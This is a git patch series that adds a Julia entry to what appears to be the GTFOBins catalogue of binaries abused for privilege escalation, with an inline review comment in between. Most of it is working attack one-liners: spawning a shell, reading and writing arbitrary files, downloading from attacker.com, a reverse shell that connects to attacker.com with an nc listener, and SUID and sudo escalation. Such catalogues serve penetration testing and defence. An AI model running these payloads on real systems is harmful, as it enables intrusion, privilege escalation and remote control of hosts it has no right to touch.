From 7a4a16409a38a526131ea611072ce30a2e967775 Mon Sep 17 00:00:00 2001
From: Davidson Mizael
Date: Mon, 17 Apr 2023 23:46:57 -0300
Subject: [PATCH 1/2] Create julia.md
---
 _gtfobins/julia.md | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 _gtfobins/julia.md
diff --git a/_gtfobins/julia.md b/_gtfobins/julia.md
new file mode 100644
index 0000000..f7240e8
--- /dev/null
+++ b/_gtfobins/julia.md
@@ -0,0 +1,25 @@
+---
+description: |
+All payloads are compatible with the Base packages from Julia.
+functions:
+ shell:
+ - description: The `run()` function runs every command passed as parameter with what is defined in `$JULIA_SHELL`. Defaults to the environment variable `$SHELL`, and falls back to `/bin/sh` if `$SHELL` is unset.
+ - code: julia -e 'while true; c = split(readline()); run(`$c`); end;'
+ file-read:
+ - code: julia -e 'println(open(f->read(f, String), "file_to_read"))'
+ file-write:
+ - code: julia -e 'open(f->write(f, "DATA"), "file_to_write", "w")'
+ file-download:
+ - code: julia -e 'download("URL", "PATH")'
+ reverse-shell:
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
+ suid:
+ - code: julia -e 'while true; c = split(readline()); run(`$c`); end;'
+ sudo:
+ - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
+ - code: sudo julia -e 'while true; c = split(readline()); run(`$c`); end;'
+---
From 43f2ea04284796b8f6cc04526f62075234873356 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Thu, 20 Apr 2023 08:51:20 +0200
Subject: [PATCH 2/2] Clean and fix julia
---
 _gtfobins/julia.md | 26 ++++++++++++++++----------
 1 file changed, 16 insertions(+), 10 deletions(-)
diff --git a/_gtfobins/julia.md b/_gtfobins/julia.md
index f7240e8..2ea7ec1 100644
--- a/_gtfobins/julia.md
+++ b/_gtfobins/julia.md
@@ -1,16 +1,21 @@
 ---
-description: |
-All payloads are compatible with the Base packages from Julia.
 functions:
 shell:
- - description: The `run()` function runs every command passed as parameter with what is defined in `$JULIA_SHELL`. Defaults to the environment variable `$SHELL`, and falls back to `/bin/sh` if `$SHELL` is unset.
- - code: julia -e 'while true; c = split(readline()); run(`$c`); end;'
+ - code: |
+ julia -e 'run(`/bin/sh`)'
 file-read:
- - code: julia -e 'println(open(f->read(f, String), "file_to_read"))'
+ - code: |
+ export LFILE=file_to_read
+ julia -e 'print(open(f->read(f, String), ENV["LFILE"]))'
 file-write:
- - code: julia -e 'open(f->write(f, "DATA"), "file_to_write", "w")'
+ - code: |
+ export LFILE=file_to_write
+ julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")'
 file-download:
- - code: julia -e 'download("URL", "PATH")'
+ - code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ julia -e 'download(ENV["URL"], ENV["LFILE"])'
 reverse-shell:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
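Review bot: The new `shell` item gives ``run(`/bin/sh`)`` with no description, and the reason an explicit shell is needed is non-obvious: Julia executes `Cmd` objects directly without any shell, and the `$JULIA_SHELL`/`$SHELL` lookup quoted in the removed text belongs to the REPL's `;` mode (`Base.repl_cmd`), not to `run()`, so the old sentence was wrong rather than merely verbose. A one-line `description:` on the same list item as the `code:` block, such as `description: Julia runs commands directly without a shell, so `/bin/sh` is spawned explicitly.`, would keep the entry self-explanatory and is also the detail a defender needs to read the resulting process tree (`julia` as the direct parent of `sh`). On the new `file-download` lines, `download(...)` resolves to `Base.download`, which, as far as I recall, is documented since Julia 1.6 as a deprecated thin wrapper around `Downloads.download`; if current Julia is the target, `julia -e 'using Downloads; Downloads.download(ENV["URL"], ENV["LFILE"])'` avoids relying on the wrapper. The `reverse-shell` item's `code:` block continues past the end of this hunk.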
@@ -18,8 +23,9 @@ functions:
 export RPORT=12345
 julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
 suid:
- - code: julia -e 'while true; c = split(readline()); run(`$c`); end;'
+ - code: |
+ ./julia -e 'run(`/bin/sh -p`)'
 sudo:
- - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
- - code: sudo julia -e 'while true; c = split(readline()); run(`$c`); end;'
+ - code: |
+ sudo julia -e 'run(`/bin/sh`)'
 ---